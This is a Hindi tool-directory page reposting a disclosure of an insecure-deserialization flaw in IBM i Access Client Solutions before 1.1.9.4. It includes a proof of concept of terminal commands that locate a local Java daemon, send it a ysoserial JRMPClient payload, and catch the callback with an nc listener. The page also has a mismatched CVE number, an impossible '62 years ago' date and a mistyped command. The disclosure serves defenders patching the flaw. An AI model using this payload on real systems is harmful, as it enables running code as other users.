Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-45185 — IBM i Access Client Solutions < 1.1.9.4 - असुरक्षित डिसीरियलाइज़ेशन के माध्यम से दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/afine-com/cve-2023-45185
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubafine-com/cve-2023-45185

CVE-2023-45185

IBM i Access Client Solutions < 1.1.9.4 - असुरक्षित डिसीरियलाइज़ेशन के माध्यम से दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
62 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-45184

IBM i Access Client Solutions < 1.1.9.4 - असुरक्षित डिसीरियलाइज़ेशन के माध्यम से दूरस्थ कोड निष्पादन।

समयरेखा

  • विक्रेता को कमजोरी की सूचना: 22.09.2023
  • नया फिक्स्ड 1.1.9.4 संस्करण जारी: 08.12.2023
  • सार्वजनिक प्रकटीकरण: 15.12.2023

विवरण

IBM i Access Client Solutions पासवर्ड स्टोरेज और पासवर्ड एन्क्रिप्शन के लिए डिक्रिप्शन कुंजी प्राप्त करने के लिए असुरक्षित डिसीरियलाइज़ेशन का उपयोग करता है। इसका उपयोग स्थानीय या दूरस्थ हमलावर द्वारा कोड निष्पादित करने के लिए किया जा सकता है।

स्थानीय सर्वर को netstat कमांड का उपयोग करके आसानी से पाया जा सकता है:

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ netstat -nltp | grep java
tcp6       0      0 :::34307                :::*                    LISTEN      3225094/java         off (0.00/0/0)

हम ps कमांड का उपयोग करके इस स्थानीय सर्वर के बारे में विवरण की पुष्टि कर सकते हैं:

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ ps aux | grep java
mmajchr+ 3224938  6.8  0.9 13305316 301392 pts/6 Sl+  12:30   0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094  0.3  0.2 11512420 79692 pts/6  Sl+  12:30   0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak  3238934  0.0  0.0   6464  1992 pts/12   R+   12:44   0:00 grep --color=auto java

हम mkubiak खाते से ysoserial पेलोड का उपयोग करके उपयोगकर्ता mmajchrowicz द्वारा कोड निष्पादन प्राप्त कर सकते हैं:

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ id
uid=1012(mkubiak) gid=1012(mkubiak) groups=1012(mkubiak),27(sudo)

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java -jar ysoserial.jar JRMPClient '127.0.0.1:9191' > jrmp.bin

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ (sleep 3; cat jrmp.bin) | nat -6 ::1 34307 

दूसरे टर्मिनल में हमें सेवा द्वारा पेलोड निष्पादित करने के बाद कनेक्शन प्राप्त होगा:

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ nc -lvnp 9191
listening on [any] 9191 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38012
JRMIK

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$

यह समस्या नेटवर्क पैकेट और उपयोगकर्ता डेटा के असुरक्षित डिसीरियलाइज़ेशन के कारण हुई थी। यह समस्या IBM i Access Client Solutions 1.1.9.4 में ठीक की गई है।

प्रभावित संस्करण

< 1.1.9.4

परामर्श

IBM i Access Client Solutions को 1.1.9.4 या नए में अपडेट करें।

संदर्भ

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45185
टूल डाउनलोड करें